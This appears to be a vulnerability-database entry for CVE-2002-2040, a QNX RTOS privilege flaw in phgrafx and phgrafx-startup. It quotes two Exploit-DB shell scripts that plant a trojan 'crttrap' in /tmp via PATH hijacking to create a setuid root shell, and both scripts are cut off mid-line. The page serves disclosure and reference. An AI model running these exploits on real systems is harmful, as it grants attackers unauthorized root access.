CVE-2002-2040
published 2002-12-31CVE-2002-2040: The (1) phrafx and (2) phgrafx-startup programs in QNX realtime operating system (RTOS) 4.25 and 6.1.0 do not properly drop privileges before executing the…
PriorityP424high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.08%
61.0th percentile
The (1) phrafx and (2) phgrafx-startup programs in QNX realtime operating system (RTOS) 4.25 and 6.1.0 do not properly drop privileges before executing the system command, which allows local users to execute arbitrary commands by modifying the PATH environment variable to reference a malicious crttrap program.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qnx | rtos | — | — |
| qnx | rtos | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
QNX RTOS 4.25/6.1 - 'phgrafx' Local Privilege Escalation
exploitdb·2002-06-03
CVE-2002-2040 QNX RTOS 4.25/6.1 - 'phgrafx' Local Privilege Escalation
QNX RTOS 4.25/6.1 - 'phgrafx' Local Privilege Escalation
---
source: https://www.securityfocus.com/bid/4915/info
The QNX phgrafx utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges.
#!/bin/sh
#
# click advanced,done, apply, accept and done.
# now you should have a setuid root shell waiting in /tmp/badc0ded
#
# www.badc0ded.com
echo "#!/bin/sh" > /tmp/crttrap
echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap
echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap
echo "/usr/bin/crttrap \$1 \$2 \$3 \$4 \$5 \$6 \$7 \$8 \$9 " >> /tmp/crttrap
chmod 755 /tmp/crttrap
export PATH="/tmp:$PATH"
/usr/photon/b
Exploit-DB
QNX RTOS 4.25/6.1 - 'phgrafx-startup' Local Privilege Escalation
exploitdb·2002-06-03
CVE-2002-2040 QNX RTOS 4.25/6.1 - 'phgrafx-startup' Local Privilege Escalation
QNX RTOS 4.25/6.1 - 'phgrafx-startup' Local Privilege Escalation
---
source: https://www.securityfocus.com/bid/4916/info
The QNX phgrafx-startup utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges.
#!/bin/sh
#
# click test,restore,continue
# now you should have a setuid root shell waiting in /tmp/badc0ded
#
# www.badc0ded.com
echo "#!/bin/sh" > /tmp/crttrap
echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap
echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap
echo "/usr/bin/crttrap \$1 \$2 \$3 \$4 \$5 \$6 \$7 \$8 \$9 " >> /tmp/crttrap
chmod 755 /tmp/crttrap
export PATH="/tmp:$PATH"
/usr/photon/b
No writeups or analysis indexed.
http://online.securityfocus.com/archive/1/275218http://www.iss.net/security_center/static/9257.phphttp://www.securityfocus.com/bid/4915http://www.securityfocus.com/bid/4916http://online.securityfocus.com/archive/1/275218http://www.iss.net/security_center/static/9257.phphttp://www.securityfocus.com/bid/4915http://www.securityfocus.com/bid/4916
2002-12-31
Published